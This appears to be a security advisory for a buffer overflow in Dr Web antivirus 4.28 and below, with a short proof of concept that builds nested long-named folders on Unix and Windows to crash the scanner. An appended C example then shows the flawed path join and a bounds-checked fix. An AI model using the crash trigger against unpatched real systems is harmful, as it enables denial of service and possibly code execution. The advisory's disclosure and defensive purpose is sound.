Vulnerable versions:
* Dr Web Version 4.28 and below
Immune versions:
* Dr Web Version 4.29b and above
When a user with access to the system creates a file or folder with a very long name,
scanning it causes a buffer overflow that overwrites EIP, thus granting the
user the ability to execute arbitrary code with root privileges.
The program consists of a monitor and a scanner. Only the scanner component was
tested, on version 4.28a, and it was found to be vulnerable.
Exploit:
Build a folder with a very long name:
set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB
mkdir /$a
mkdir /$a/$b
Or, on Windows:
SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%B%
Use whichever form matches the target system.
When the anti-virus tries to scan the folder, it crashes.
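As an added illustration (not part of the advisory and not Dr Web's code), the C below shows the unchecked fixed-buffer path join that produces this class of crash, beside a bounded version that refuses an entry before any byte is copied. The buffer size SCAN_PATH_MAX, the function names, and the two-level /AAAA.../BBBB... layout it replays are all assumptions chosen for the example; note that each component can fit on its own while the nested path does not, which is the case a per-component check misses.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Deliberately small path buffer for the illustration (assumption); a real
 * scanner would use PATH_MAX, but the arithmetic is identical. */
#define SCAN_PATH_MAX 128

/*
 * The vulnerable pattern the advisory describes, shown only as a comment so
 * nothing in this file can overrun memory: a fixed buffer filled from
 * directory entries that the user controls, with no length check.
 *
 *   char path[SCAN_PATH_MAX];
 *   strcpy(path, dir);
 *   strcat(path, "/");
 *   strcat(path, entry);   // overruns once dir + entry are long enough
 */

/* Hardened form: compute the joined length first (guarding the addition
 * itself against wrap-around) and refuse the entry if it would not fit,
 * terminator included. Returns 0 on success, -1 when rejected; on
 * rejection out[] is left untouched. */
int build_scan_path(char *out, size_t outsz, const char *dir, const char *entry)
{
    size_t dlen = strlen(dir), elen = strlen(entry);

    if (dlen > SIZE_MAX - 2 - elen)      /* dlen + 1 + elen + 1 would wrap */
        return -1;
    if (dlen + 1 + elen + 1 > outsz)     /* dir, '/', entry, NUL */
        return -1;

    memcpy(out, dir, dlen);
    out[dlen] = '/';
    memcpy(out + dlen + 1, entry, elen);
    out[dlen + 1 + elen] = '\0';
    return 0;
}

/* Constructed helper: a name made of n copies of c, like the A/B runs in
 * the advisory. The caller frees the result. */
static char *repeated(size_t n, char c)
{
    char *s = malloc(n + 1);
    if (!s)
        abort();
    memset(s, c, n);
    s[n] = '\0';
    return s;
}

/* Replays the advisory's two-level layout (/AAAA.../BBBB...) against the
 * checked builder. Returns 1 if both levels fit, 0 if only the nested
 * level is rejected, -1 if even the first level is rejected. */
int nested_long_names_fit(size_t component_len)
{
    char level1[SCAN_PATH_MAX], level2[SCAN_PATH_MAX];
    char *a = repeated(component_len, 'A');
    char *b = repeated(component_len, 'B');
    int rc;

    if (build_scan_path(level1, sizeof level1, "", a) != 0)
        rc = -1;
    else if (build_scan_path(level2, sizeof level2, level1, b) != 0)
        rc = 0;
    else
        rc = 1;

    free(a);
    free(b);
    return rc;
}

int main(void)
{
    size_t lens[] = { 40, 100, 127 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("component length %zu: %d\n", lens[i],
               nested_long_names_fit(lens[i]));
    return 0;
}
```

With a 128-byte buffer, 40-character components fit at both levels, 100-character components fit at the first level but are rejected once nested, and 127-character components are rejected immediately; the rejected entry is simply skipped and logged rather than copied, which is the behaviour a scanner needs when walking trees it does not trust.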
Solution:
Download the latest version from Dr Web:
Newest Versions
Friday, July 11, 2008
Buffer overflow in cmd